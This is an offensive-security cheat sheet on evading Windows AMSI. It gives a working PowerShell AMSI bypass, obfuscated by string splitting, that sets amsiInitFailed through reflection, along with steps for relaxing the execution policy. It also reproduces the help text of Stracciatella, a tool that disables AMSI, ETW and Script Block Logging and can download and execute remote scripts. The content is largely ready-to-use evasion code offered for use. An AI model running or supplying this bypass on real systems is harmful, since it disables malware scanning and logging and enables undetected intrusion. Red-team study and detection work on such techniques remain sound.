AMSI

PowerShell version

• Other bypasses

A "poor man’s" AMSI bypass for executing scripts and .NET content. This only applies to the current PowerShell session.

1. Start PowerShell with relaxed execution policy (e.g. powershell -executionpolicy bypass powershell.exe) or set it temporarily (e.g. Set-ExecutionPolicy Unrestricted).
2. Apply an AMSI bypass.
3. Load your scripts.

$type = "System.Management."
$type += "Automation."
$type += "Am"
$type += "si"
$type += "Utils"
$field = "am"
$field += "si"
$field += "InitFailed"
$method = "Non"
$method += "Public"
$method += ",Static"
$util = [Ref].Assembly.GetType($type);
$failed = $util.GetField($field, $method);
$failed.SetValue($null, $true);

Stracciatella

PowerShell runspace from within C# (aka SharpPick technique) with AMSI, ETW, and Script Block Logging disabled.^[https://github.com/mgeeky/Stracciatella]

Stracciatella.exe (Syslifters offsec-tools)

PS D:\> Stracciatella -h

  :: Stracciatella - Powershell runspace with AMSI, ETW and Script Block Logging disabled.
  Mariusz Banach / mgeeky, '19-22 <mb@binary-offensive.com>
  v0.7

Usage: stracciatella.exe [options] [command]
  -s <path>, --script <path> - Path to file containing Powershell script to execute. If not options given, will enter
                               a pseudo-shell loop. This can be also a HTTP(S) URL to download & execute powershell script.
  -v, --verbose              - Prints verbose informations
  -n, --nocleanup            - Don't remove CLM disable leftovers (DLL files in TEMP and COM registry keys).
                               By default these are going to be always removed.
  -C, --leaveclm             - Don't attempt to disable CLM. Stealthier. Will avoid leaving CLM disable artefacts undeleted.
  -f, --force                - Proceed with execution even if Powershell defenses were not disabled.
                               By default we bail out on failure.
  -c, --command              - Executes the specified commands You can either use -c or append commands after
                               stracciatella parameters: cmd> straciatella ipconfig /all
                               If command and script parameters were given, executes command after running script.
  -x <key>, --xor <key>      - Consider input as XOR encoded, where <key> is a one byte key in decimal
                               (prefix with 0x for hex)
  -p <name>, --pipe <name>   - Read powershell commands from a specified named pipe. Command must be preceded with 4 bytes of
                               its length coded in little-endian (Length-Value notation).
  -t <millisecs>, --timeout <millisecs>
                             - Specifies timeout for pipe read operation (in milliseconds). Default: 60 secs. 0 - infinite.
  -e, --cmdalsoencoded       - Consider input command (specified in '--command') encoded as well.
                               Decodes input command after decoding and running input script file.
                               By default we only decode input file and consider command given in plaintext